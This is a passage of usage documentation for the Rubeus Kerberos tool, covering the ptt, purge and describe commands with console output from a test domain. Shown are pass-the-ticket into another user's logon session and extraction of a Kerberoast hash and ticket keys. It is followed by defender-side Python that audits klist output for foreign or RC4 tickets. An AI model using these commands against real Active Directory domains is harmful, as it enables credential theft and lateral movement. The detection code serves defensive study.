Ticket Management
Breakdown of the ticket management commands:
| Command | Description |
| --- | --- |
| ptt | Apply a ticket to the current (or specified) logon session |
| purge | Purge the current (or specified) logon session of Kerberos tickets |
| describe | Describe a ticket base64 blob or .kirbi file |
ptt
The ptt action will submit a /ticket:X (TGT or service ticket) for the current logon session through the LsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (if elevated) to the logon session specified by /luid:0xA... Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.
C:\Rubeus>Rubeus.exe ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Import Ticket
[+] Ticket successfully imported!
C:\Rubeus>Rubeus.exe klist
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
    Server Name       : krbtgt/testlab.local @ TESTLAB.LOCAL
    Client Name       : dfm.a @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
Elevated ticket application to another logon session:
C:\Rubeus>Rubeus.exe klist /luid:0x474722b
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID     : 0x474722b
UserName                 : patsy
Domain                   : TESTLAB
LogonId                  : 0x474722b
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 10:58:53 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : [email protected]
    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:58:53 PM ; 2/11/2019 7:58:53 PM ; 2/18/2019 2:58:53 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : patsy @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
C:\Rubeus>Rubeus.exe ptt /luid:0x474722b /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Import Ticket
[*] Target LUID: 0x474722b
[+] Ticket successfully imported!
C:\Rubeus>Rubeus.exe klist /luid:0x474722b
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (All Users)
[*] Target LUID     : 0x474722b
UserName                 : patsy
Domain                   : TESTLAB
LogonId                  : 0x474722b
UserSID                  : S-1-5-21-883232822-274137685-4173207997-1169
AuthenticationPackage    : Kerberos
LogonType                : Interactive
LogonTime                : 2/11/2019 10:58:53 PM
LogonServer              : PRIMARY
LogonServerDNSDomain     : TESTLAB.LOCAL
UserPrincipalName        : [email protected]
    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 2:55:18 PM ; 2/11/2019 7:55:18 PM ; 2/18/2019 2:55:18 PM
    Server Name       : krbtgt/testlab.local @ TESTLAB.LOCAL
    Client Name       : dfm.a @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
purge
The purge action will purge all Kerberos tickets from the current logon session, or (if elevated) from the logon session specified by /luid:0xA...
C:\Rubeus>Rubeus.exe klist
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
    [1] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : krbtgt/TESTLAB.LOCAL @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
    [2] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 2/11/2019 3:05:36 PM ; 2/11/2019 8:05:36 PM ; 2/18/2019 3:05:36 PM
    Server Name       : cifs/primary.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
C:\Rubeus>Rubeus.exe purge
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
Luid: 0x0
[*] Action: Purge Tickets
[+] Tickets successfully purged!
C:\Rubeus>Rubeus.exe klist
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: List Kerberos Tickets (Current User)
C:\Rubeus>
Elevated purging of another logon session:
C:\Rubeus>Rubeus.exe triage /luid:0x474722b
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Triage Kerberos Tickets
[*] Target LUID     : 0x474722b
-----------------------------------------------------------------------------------
| LUID      | UserName              | Service              | EndTime              |
-----------------------------------------------------------------------------------
| 0x474722b | dfm.a @ TESTLAB.LOCAL | krbtgt/testlab.local | 2/11/2019 7:55:18 PM |
-----------------------------------------------------------------------------------
C:\Rubeus>Rubeus.exe purge /luid:0x474722b
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
Luid: 0x474722b
[*] Action: Purge Tickets
[*] Target LUID: 0x474722b
[+] Tickets successfully purged!
C:\Rubeus>Rubeus.exe triage /luid:0x474722b
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Triage Kerberos Tickets
[*] Target LUID     : 0x474722b
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
describe
The describe action takes a /ticket:X value (TGT or service ticket), parses it, and describes the values of the ticket. Like other /ticket:X parameters, the value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk.
If the supplied ticket is a service ticket AND the encryption type is RC4_HMAC, an extracted Kerberoast-compatible hash is output. If the ticket is a service ticket but the encryption key is AES128/AES256, a warning is displayed. If the ticket is a TGT, no hash or warning is displayed.
Display information about a TGT:
C:\Rubeus>Rubeus.exe describe /ticket:doIFmjCCBZagAwIBBaEDAgEWoo..(snip)..
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.3.3
[*] Action: Describe Ticket
UserName              :  dfm.a
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  krbtgt/testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  2/11/2019 2:55:18 PM
EndTime               :  2/11/2019 7:55:18 PM
RenewTill             :  2/18/2019 2:55:18 PM
Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType               :  rc4_hmac
Base64(key)           :  e3MxrlTu9jHh9hG43UfiAQ==
Display information about a service ticket with an extracted Kerberoast hash:
C:\Rubeus>Rubeus.exe describe /ticket:service_ticket.kirbi
 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/
v1.4.1
[*] Action: Describe Ticket
UserName              :  harmj0y
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  asdf/asdfasdf
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  2/20/2019 8:58:14 AM
EndTime               :  2/20/2019 12:41:09 PM
RenewTill             :  2/27/2019 7:41:09 AM
Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType               :  rc4_hmac
Base64(key)           :  WqGWK4htp7rM1CURpxjMPA==
Kerberoast Hash       :  $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$DEB467BF9C9023E...(snip)...
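Added example, not part of the original page or of Rubeus: a defender-side audit of saved `klist /luid` output that reports two conditions from the sections above, a ticket whose Client Name differs from the owner of the logon session holding it (the state shown after the elevated ptt) and a service ticket listed with an RC4 type (the case the describe section singles out). The function names and the sample text are constructed for illustration, and the RC4 check assumes the type printed by klist reflects the ticket's encryption type.

```python
import re

# Constructed sample in the layout of the `klist /luid` output shown above.
SAMPLE = """\
UserName                 : patsy
LogonId                  : 0x474722b
    [0] - 0x12 - aes256_cts_hmac_sha1
    Server Name       : krbtgt/testlab.local @ TESTLAB.LOCAL
    Client Name       : dfm.a @ TESTLAB.LOCAL
    [1] - 0x17 - rc4_hmac
    Server Name       : cifs/primary.testlab.local @ TESTLAB.LOCAL
    Client Name       : patsy @ TESTLAB.LOCAL
"""

FIELD = re.compile(r"^\s*([A-Za-z ]+?)\s*:\s*(.+?)\s*$")
TICKET = re.compile(r"^\s*\[(\d+)\] - 0x[0-9a-fA-F]+ - (\S+)")

def parse_sessions(text):
    """Group tickets under the logon session (UserName/LogonId) that holds them."""
    sessions, cur, tkt = [], None, None
    for line in text.splitlines():
        m = TICKET.match(line)
        if m and cur is not None:
            tkt = {"index": int(m.group(1)), "etype": m.group(2).lower()}
            cur["tickets"].append(tkt)
        m = FIELD.match(line)  # never matches a "[n] - ..." ticket line
        key, val = m.groups() if m else (None, None)
        if key == "UserName":  # a new session block starts here
            cur, tkt = {"user": val, "luid": None, "tickets": []}, None
            sessions.append(cur)
        elif key == "LogonId" and cur is not None:
            cur["luid"] = val
        elif key in ("Server Name", "Client Name") and tkt is not None:
            tkt[key.split()[0].lower()] = val.split("@")[0].strip()  # drop realm
    return sessions

def audit(text):
    """Return (luid, ticket index, finding, detail) tuples."""
    findings = []
    for s in parse_sessions(text):
        for t in s["tickets"]:
            client, server = t.get("client", ""), t.get("server", "")
            # ptt into another session leaves a client that is not the session owner
            if client.lower() != s["user"].lower():
                findings.append((s["luid"], t["index"], "foreign-client", client))
            # RC4 service tickets are the ones `describe` can turn into a hash
            if t["etype"].startswith("rc4") and not server.lower().startswith("krbtgt/"):
                findings.append((s["luid"], t["index"], "rc4-service-ticket", server))
    return findings
```

Output from `klist` without `/luid` has no UserName/LogonId block, so its tickets are skipped rather than compared against an unknown owner.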